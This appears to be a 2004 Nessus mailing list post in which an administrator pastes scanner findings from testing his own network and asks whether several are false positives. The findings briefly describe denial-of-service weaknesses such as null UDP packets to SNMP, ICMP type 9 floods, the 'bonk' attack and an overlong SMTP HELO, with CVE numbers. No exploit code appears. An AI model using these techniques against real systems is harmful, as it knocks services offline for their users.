Pen testing questions

Rob Notaro Rob.Notaro at sman.com
Fri Nov 19 14:59:33 EST 2004 

I recently pen tested a domain I oversee and came across the following
holes that were puzzlers.

 

snmp (161/tcp) High It was possible to

crash either the remote host or the firewall

in between us and the remote host by sending

an UDP packet of null size going to port 161 (snmp)

This flaw may allow an attacker to shut down

your network.

 

CVE : CVE-2000-0221

BID : 1009

 

 

My gear is behind a Cisco router and PIX not Nortel as the Bugtraq ID
suggests.  I'm also blocking all SNMP traffic at the router and firewall
so I'm not sure why this went off.

 

http (80/tcp) High It was possible to make IIS use 100% of the CPU by

sending it malformed extension data in the URL

requested, preventing him to serve web pages

to legitimate clients.

Solution : Microsoft has made patches available at :

- For Internet Information Server 4.0:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20906

- For Internet Information Server 5.0:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20904

Risk factor : High

CVE : CVE-2000-

 

 

 

Already have SP3 on Win2k which negates this update. 

 

general/tcp High It was possible to crash the remote

machine by flooding it with ICMP type 9 packets.

A cracker may use this attack to make this

host crash continuously, preventing you

from working properly.

Solution : upgrade your Windows 9x operating system or change it.

Reference : http://support.microsoft.com/default.aspx?scid=KB

en-us

q216141

 

and

 

http (80/tcp) High The remote web server dies when an URL consisting of
a

long invalid string of % is sent.

A cracker may use this flaw to make your server crash continually.

Solution : upgrade your server or firewall it.

Risk factor : High

 

Running Windows 2000 server with latest patches on this machine.

 

 

smtp (25/tcp) High It was possible to perform

a denial of service against the remote

Interscan SMTP server by sending it a special long HELO command.

This problem allows an attacker to prevent

your Interscan SMTP server from handling requests.

Solution : contact your vendor for a patch.

Risk factor : High

CVE : CAN-1999-1529

BID : 787

 

 

Exchange 2003 on Windows 2000 with latest patches.  

 

general/udp High It was possible

to make the remote server crash

using the 'bonk' attack.

An attacker may use this flaw

shut down this server, thus

preventing your network from

working properly.

Solution : contact your operating

system vendor for a patch.

Risk factor : High

CVE : CAN-1999-0258

 

 

Is this a false positive?  Fully patches Win2K server.

 

 

 


Confidentiality Disclosure:  The information contained in this electronic mail transmission is confidential, and is intended only for the stated entity or individual recipient of the transmission.  If you are not the intended recipient, you are hereby notified that any review, disclosure, copying, distribution, or reliance upon the content of this communication is strictly prohibited.  If you have received this electronic mail transmission in error, please reply to the sender, and delete this message from your in-box and Internet server.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.nessus.org/pipermail/nessus/attachments/20041119/bf4972ed/attachment.html

More information about the Nessus mailing list